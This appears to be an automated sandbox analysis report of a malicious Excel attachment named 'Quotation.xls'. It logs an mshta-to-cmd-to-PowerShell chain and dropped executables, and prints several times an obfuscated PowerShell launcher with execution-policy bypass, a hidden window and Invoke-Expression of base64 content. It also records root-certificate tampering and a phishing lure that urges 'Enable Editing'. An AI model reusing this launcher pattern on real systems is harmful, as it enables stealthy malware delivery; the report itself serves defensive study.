            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: csrss[1].exe.7.drStatic PE information: section name: .managed
            Source: csrss[1].exe.7.drStatic PE information: section name: hydrated
            Source: winiti.exe.7.drStatic PE information: section name: .managed
            Source: winiti.exe.7.drStatic PE information: section name: hydrated
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899F022D push eax; iretd 7_2_000007FE899F0241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899F00BD pushad ; iretd 7_2_000007FE899F00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00457106 push ecx; ret 25_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045B11A push esp; ret 25_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0045E54D push esi; ret 25_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00457A28 push eax; ret 25_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00434E56 push ecx; ret 25_2_00434E69

            Persistence and Installation Behavior

            Source: Office documentLLM: Score: 9 Reasons: The screenshot contains a visually prominent Microsoft Office logo and text stating 'This document is protected,' which can mislead users into thinking it is a legitimate document. The instructions provided create a sense of urgency by stating 'Open the document in Microsoft Office' and 'If this document was downloaded from your email, please click Enable Editing from the yellow bar above.' This language is designed to prompt immediate action. The use of a well-known brand (Microsoft Office) adds to the credibility of the document, increasing the likelihood of users following the instructions without suspicion. The sense of urgency is directly connected to the prominent instructions, making it highly likely that the document is designed to deceive users into enabling potentially harmful content.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00406EB0 ShellExecuteW,URLDownloadToFileW,25_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\winiti.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: Quotation.xls Stream path 'MBD00034653/Package' entropy: 7.97239388977 (max. 8.0)
            Source: Quotation.xls Stream path 'Workbook' entropy: 7.99932524718 (max. 8.0)
            Source: ~DF91B6A489623540E3.TMP.0.dr Stream path 'Package' entropy: 7.96792988005 (max. 8.0)
            Source: 37330000.0.dr Stream path 'MBD00034653/Package' entropy: 7.96792988005 (max. 8.0)
            Source: 37330000.0.dr Stream path 'Workbook' entropy: 7.99939991039 (max. 8.0)

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040F7A7 Sleep,ExitProcess,25_2_0040F7A7
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 70000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,25_2_0041A748
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3077
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6875
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 9838
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2777
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1339
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe API coverage: 7.2 %
            Source: C:\Windows\System32\mshta.exe TID: 3316 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440 Thread sleep count: 3077 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440 Thread sleep count: 6875 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720 Thread sleep count: 149 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720 Thread sleep time: -447000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3768 Thread sleep time: -240000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720 Thread sleep count: 9838 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3720 Thread sleep time: -29514000s >= -30000s
            Source: C:\Windows\System32\mshta.exe TID: 3848 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968 Thread sleep count: 2777 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972 Thread sleep count: 1339 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
